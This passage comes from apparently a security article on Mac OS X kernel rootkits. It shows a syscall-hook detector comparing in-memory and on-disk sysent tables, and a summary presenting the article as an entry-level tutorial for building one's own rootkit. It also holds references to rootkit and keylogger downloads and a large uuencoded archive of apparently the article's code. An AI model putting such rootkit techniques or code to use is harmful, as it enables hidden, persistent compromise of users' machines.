+			return (p + 32);
+		}
+		p++;
+	}
+
+	return NULL; /* epic fail */
+}
+
+This function can later be used in a simple detector.
+
+struct sysent *_sysent_from_ram;
+struct sysent *_sysent_from_hdd;
+
+_sysent_from_ram = (struct sysent *)get_sysent_from_ram();
+_sysent_from_hdd = (struct sysent *)get_sysent_from_disk();
+
+for (i = 0; i < 428; i++) {
+	if (get_syscall_addr(i, _sysent_from_ram) != get_syscall_addr(i,
+	_sysent_from_hdd))
+		report_hooked_syscall(i);
+}
+
+Of course this method has it's flaws. An attacker may manipulate the
+SYS_open syscall and redirect the call to a rogue copy of the kernel image
+if the file /mach_kernel is accessed. This can be overcome by always
+keeping a fresh and clean copy of the kernel image on a non-writable
+media.
+
+This method is also not capable of detecting inline function hooks in the
+system call handler functions, that's a modification left as an exercise
+for the reader to implement.
+
+--[ 7 - Summary
+
+Rootkits on Mac OS X is not a new topic, but not as well researched as
+i.e. rootkits on Windows or Linux. As we have shown, the techniques used
+is quite similar to the ones used on other unix-like operating systems. In
+addition to this OS X has some extra goodies, like the I/O Kit framework
+and the Mach API, that provides really useful features for people trying
+to subvert the XNU kernel.
+
+Manipulating syscalls, internal kernel structures and other parts of the
+XNU kernel is a great way to hide processes, files and folders and even to
+place backdoors accessible directly from userland. All this can be
+achieved using either a kernel extension or the Mach API, and if done
+right almost impossible to detect. Both techniques have different
+advantages and it's up to you to choose which technique to use in your own
+rootkit.
+
+The purpose of this article was first and foremost to give a basic
+understanding of the subject and is intended as an entry level tutorial
+for anyone wishing to implement their own OS X kernel rootkit and we
+sincerely hope that it helped to shed some light on the subject.
+
+--[ 8 - References
+
+[1] Landon Fuller - Fixing ptrace(pt_deny_attach, ...) on Mac OS X 10.5 Leopard
+     http://landonf.bikemonkey.org/code/macosx/Leopard_PT_DENY_ATTACH.20080122.html
+
+[2] Apple Developer Connection
+     http://developer.apple.com
+
+[3] Apple - Darwin source code
+     http://opensource.apple.com/darwinsource/
+
+[4] Apple Kernel Programming guide
+     http://developer.apple.com/documentation/Darwin/Conceptual/KernelProgramming/keepout/keepout.html
+
+[5] nemo of felinemenace
+     http://felinemenace.org/~nemo/
+
+[6] I/O Kit Device Driver Design Guidelines: Kernel-User Notification
+     http://developer.apple.com/documentation/DeviceDrivers/Conceptual/WritingDeviceDriver/KernelUserNotification/KernelUserNotification.html
+
+[7] Linux on-the-fly kernel patching without LKM
+     http://phrack.org/issues.html?issue=58&id=7#article
+
+[8] phalanx rootkit by rebel
+     http://packetstormsecurity.org/UNIX/penetration/rootkits/phalanx-b6.tar.bz2
+
+[9] WeaponX rootkit by nemo
+     http://packetstormsecurity.org/UNIX/penetration/rootkits/wX.tar.gz
+
+[10] logKext keylogger by drspringfield
+      http://code.google.com/p/logkext/
+
+[11] Designing BSD Rootkits by Joseph Kong
+      ISBN 1593271425
+
+--[ 9 - Code
+
+begin 644 code.tar.gz
+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
